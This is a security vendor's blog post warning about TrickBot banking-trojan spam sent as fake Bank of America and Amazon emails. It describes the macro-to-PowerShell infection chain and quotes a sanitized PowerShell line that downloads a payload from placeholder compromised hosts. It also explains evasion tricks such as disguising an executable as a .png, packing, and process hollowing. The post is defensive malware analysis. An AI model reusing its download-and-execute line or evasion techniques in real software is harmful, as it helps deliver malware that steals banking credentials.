TrickBot Trojan in Fake Bank of America and Amazon Email

We’re blocking a “Trickbot” Banking Trojan for our global customers. The malware is delivered via fake Bank of America and Amazon email attachments. Trickbot has been targeting other countries and is now hitting U.S. banks using the Necurs botnet. Once installed, a Banking Trojan runs without you knowing it, stealing your login and password when you visit a recognized bank website. It can then steal your other information, your identity and your money.

With threat investigator Greg C. and threat analyst Todd S.

How to Recognize This Email Spam

Be careful if you receive an email like one of the following that appears to be from Bank of America or Amazon:

Fake Bank of America email infects your computer with the TrickBot banking Trojan

Fake Bank of America email infects your computer with the TrickBot banking Trojan

Fake Amazon email infects your computer with the TrickBot banking Trojan

Fake Amazon email infects your computer with the TrickBot banking Trojan

There are several threat indicators that, taken together, should make you very suspcious:

No Personal Info
There is no personally identifying information in the email (e.g., your name, your account number, etc.). However, even some email that includes such info can still be spam, for example, in a spear-phishing attack.
Suspicious "Click-Me" Link
If you hover over the link that the email wants you to click, your browser Window displays the destination URL (usually at the bottom of the browser window). In this case, you’ll see that it does NOT go to Bank of America, Amazon, or wherever the email is pretending to be from. Again, be careful. Spammers can make a link look similar to the real URL, so that many people won’t notice the difference. That’s why it is never safe to click the link in an email. If you need to check your online account, type the address you already know and trust in your browser.
Suspicious Attachment
Most legitimate banks and companies won’t ask you to open an attachment. Also, the attached document is not password protected and the message is not encrypted.
Urgency or Deadline
A lot of spam uses an old social engineering trick, creating a false sense of urgency so you act without thinking. This can also be done with a fake deadline. These emails are a little more subtle in that regard. The Bank of America one simply indicates that the message will expire in 90 days. The Amazon one says that your order is being prepared for shipment, which looks designed to get the recipient to act before it is shipped (and possibly too late for a refund).

Malicious Attachment Infects Your System

Do NOT download or open the document attached to the email. It contains malicious code that will automatically start a chain of events, infecting your machine with the Trickbot Trojan. You won’t even know it’s happening. Our email security professionals opened two of them in a safe controlled environment. Here is what those look like:

Fake Bank of America email attachment infects your computer with the TrickBot banking Trojan

Fake Bank of America email attachment infects your computer with the TrickBot banking Trojan

Fake Amazon email 
attachment infects your computer with the TrickBot banking Trojan

Fake Amazon email attachment infects your computer with the TrickBot banking Trojan

How the Trojan Infects Your Computer

A macro embedded in the attached Word doc infects your computer using multiple steps and other obfuscation techniques. First, it downloads what appears to be an image file (let’s call it “FileA.png”) from a malicious or hacked website. To do that without being detected:

  1. The macro initiates a Windows command shell process (cmd.exe) on your computer that itself runs a PowerShell process (powershell.exe).
  2. The PowerShell process initiates a second Windows command shell that runs a second PowerShell process.
  3. The second PowerShell process grabs FileA.png from the compromised website and saves it as an exe file (which we’ll call “FileA.exe”). If it can’t get the png file from that URL, it tries a second website.
Obfuscation Note
FileA.exe is a “packed” executable file, which hides it from signature-based antivirus scanning during the download. Also, the source file’s “.png” extension will let it bypass antispam filters that block files with ".exe" extensions and don't look at the file data itself. It might also bypass web proxy firewalls that are blocking downloads by file extension and can look harmless in web proxy logs if the MIME type of the file is not checked and logged.

The command in the second Powershell process that actually downloads the png file has this syntax:

try{fitt(''http://<compromised-url>/FileA.png’')}catch{fitt(''http://<compromised-url2>/FileB.png'')}

The second PowerShell process then runs FileA.exe, which unpacks itself to a second executable (we’ll call it “FileB.exe”).

FileB.exe then uses another obfuscation technique, called "process hollowing", to hide its malicious activity. It starts a legitimate Windows process called "svchost.exe" in a suspended state (so it won’t run yet). Then FileB.exe replaces the code inside the legitimate svchost.exe with the Trojan’s code and runs the now malicious svchost.exe process.

You’ll probably never notice any of this is happening on your computer.

How the TrickBot banking Trojan infects your computer

How the TrickBot banking Trojan infects your computer

How the Trojan Steals Your Login and Password

When you visit a banking website targeted by Trickbot, the Trojan injects code into the process running your browser. It sends your login username and password to the attacker’s command and control (CnC) servers. Armed with login credentials, the attacker can get other information in your account (e.g., to sell it or steal your identity) and possibly steal your money.

Most people won’t know what is happening and cannot easily figure it out. The Trojan keeps a live connection to your bank’s website while you’re on it, even displaying the bank’s URL and actual digital certificate in your browser’s address bar. This is different from a phishing scam where the attacker sends you to a fake website that you can often detect by the suspicious URL and other visual differences from the real website. However, in this case, you go to and remain on your bank’s website.

How We Block this Trojan

We are blocking this TrickBot banking Trojan for our global customers with several filters, depending on the specific email that is sent to them. There is at least one content filter and multiple phrase filters. We have also blocked one or more sender domains.

About SpamStopsHere

To find out more about SpamStopsHere, visit our product page, check out our simple pricing and start a FREE 30-Day trial, or contact us anytime via phone (800-458-3348 | 734-426-7500), chat or email. We're always here. 24/7/365.

Try SpamStopsHere Today!